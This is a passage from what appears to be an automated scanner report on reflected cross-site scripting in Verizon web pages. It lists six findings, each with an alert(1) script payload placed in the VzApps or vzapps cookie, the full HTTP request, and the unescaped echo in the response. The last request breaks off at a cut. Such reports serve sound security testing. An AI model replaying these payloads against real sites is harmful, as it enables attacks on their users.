3.190. http://www22.verizon.com/Residential/HighSpeedInternet/Features/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab748'><script>alert(1)</script>80592d937c4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXab748'><script>alert(1)</script>80592d937c4; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92716
Expires: Sat, 20 Nov 2010 03:14:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXab748'><script>alert(1)</script>80592d937c4; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAB748'><SCRIPT>ALERT(1)</SCRIPT>80592D937C4 ' />
...[SNIP]...

3.191. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 668ed'><script>alert(1)</script>bf2d4cd51f6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX668ed'><script>alert(1)</script>bf2d4cd51f6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 91146
Expires: Sat, 20 Nov 2010 03:14:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX668ed'><script>alert(1)</script>bf2d4cd51f6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX668ED'><SCRIPT>ALERT(1)</SCRIPT>BF2D4CD51F6 ' />
...[SNIP]...

3.192. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 5360b<script>alert(1)</script>87b39a50ac5 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX5360b<script>alert(1)</script>87b39a50ac5; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92738
Expires: Sat, 20 Nov 2010 03:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:29 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX5360b<script>alert(1)</script>87b39a50ac5; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX5360B<SCRIPT>ALERT(1)</SCRIPT>87B39A50AC5 </DIV>
...[SNIP]...

3.193. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 85766<script>alert(1)</script>8553ba7b684 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX85766<script>alert(1)</script>8553ba7b684; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92738
Expires: Sat, 20 Nov 2010 00:12:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX85766<script>alert(1)</script>8553ba7b684; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX85766<SCRIPT>ALERT(1)</SCRIPT>8553BA7B684 </DIV>
...[SNIP]...

3.194. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5b24'><script>alert(1)</script>d2df3510f80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc5b24'><script>alert(1)</script>d2df3510f80; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 92742
Expires: Sat, 20 Nov 2010 00:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXc5b24'><script>alert(1)</script>d2df3510f80; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: Features &amp; Services
</title><meta name="keywords" content="verizon high speed internet features, verizon features
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC5B24'><SCRIPT>ALERT(1)</SCRIPT>D2DF3510F80 ' />
...[SNIP]...

3.195. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/HSIvsCable/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 790ec<script>alert(1)</script>1fb2881387e was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/HSIvsCable/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX790ec<script>alert(1)</script>1fb2881387e; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; 